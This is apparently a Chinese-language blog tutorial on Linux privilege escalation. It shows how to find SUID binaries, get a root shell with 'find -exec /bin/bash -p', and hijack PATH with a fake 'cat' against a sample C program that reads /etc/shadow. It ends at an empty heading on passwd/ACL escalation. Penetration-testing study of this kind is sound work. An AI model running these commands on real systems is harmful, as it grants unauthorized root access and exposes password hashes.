Linux提权

1.利用suid提权

参考博客1
参考博客2
suid（set uid）是一种特殊权限，具有这种权限的文件在执行时会使调用者暂时获得该文件拥有者的权限。这种设置只针对于二进制可执行文件

（1）如何设置suid

chmod u+s filename //设置suid位
chmod u-s filename //去掉suid设置

（2）如何找到设置了suid的程序

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

（3） suid提权

常见可以用来提权的程序有：nmap、vim、find、bash、more、less、nano、cp

这里用find举例
a.首先使用（2）中的命令查找有suid的程序

find可以添加-exec参数来对查找的结果进行处理：
b.find “一个已经存在的suid文件” -exec “whoami” ;
注：1.这个文件必须存在
2.-exec命令需要以;结尾，但是;在bash中有特殊含义(代表代码块的结束)，需要转义。

该命令使用find查找该目录，并用whoami查看此时权限
之后执行口令进入shell
c.

find filename -exec /bin/bash -p  \;

2.利用环境变量提权

参考博客

（1）创建拥有 suid 权限的程序

详情请看参考博客
比如创建内容为下的程序，编译后名为test-exp：

#include <stdlib.h>
#include <unistd.h>
int main()
{
    setuid(0);//run as root
    system("id");
    system("cat /etc/shadow");
    return 0;
}

（2）劫持环境变量

echo $PATH //查看系统环境变量

挑选一个目录，执行

echo "/bin/bash" > cat && chmod 777 cat //相当于构造了一个cat

把当前目录加入到环境变量，比如我选择/tmp目录，这个添加是临时的，当终端关闭时又会恢复原来的样子

export PATH=.:$PATH

因为在 suid程序中 中存在 system(“cat /etc/shadow”);，使用 cat 命令，因为 cat 命令被劫持成了 /bin/bash，就变成了 system("/bin/bash /etc/shadow)，这个文件又是 SUID 文件以 root 权限执行，就直接切换至了 root 用户。

切换到有suid程序的目录下面,调出shell界面

./test-exp 

提权成功，可以执行命令。

3.passwd提权（利用acl配置缺陷）